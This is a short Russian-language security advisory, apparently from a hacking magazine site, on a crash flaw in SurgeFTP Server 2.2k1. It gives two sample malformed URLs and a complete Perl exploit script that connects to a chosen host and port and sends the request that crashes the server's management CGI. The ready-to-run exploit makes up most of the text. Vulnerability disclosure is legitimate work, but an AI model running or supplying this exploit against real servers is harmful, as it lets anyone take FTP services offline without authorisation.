Хакер #305. Многошаговые SQL-инъекции
Программа: SurgeFTP Server 2.2k1
Уязвимость обнаружена в SurgeFTP Server. Удаленный пользователь может аварийно завершить работу FTP сервера.
Пример:
http://[server]:7021/cgi/surgeftpmgr.cgi?cmd=%%
http://[server]/cgi/?r34ct=%di e%
Эксплоит:
#!/usr/bin/perl
use IO::Socket;
printf "SurgeFtp 2.2k1\n\n";
if(@ARGV < 2) { die "\nUsage: host port \n"; }
$port = @ARGV[1];
$host = @ARGV[0];
$sock =new IO::Socket::INET(PeerAddr => $host,PeerPort => $port,Proto => "TCP");
print $sock "GET /cgi/surgeftpmgr.cgi?cmd=%% http/1.0\n\n";
while (<$sock>){print}
close ($sock);
print("\n\n");
exit;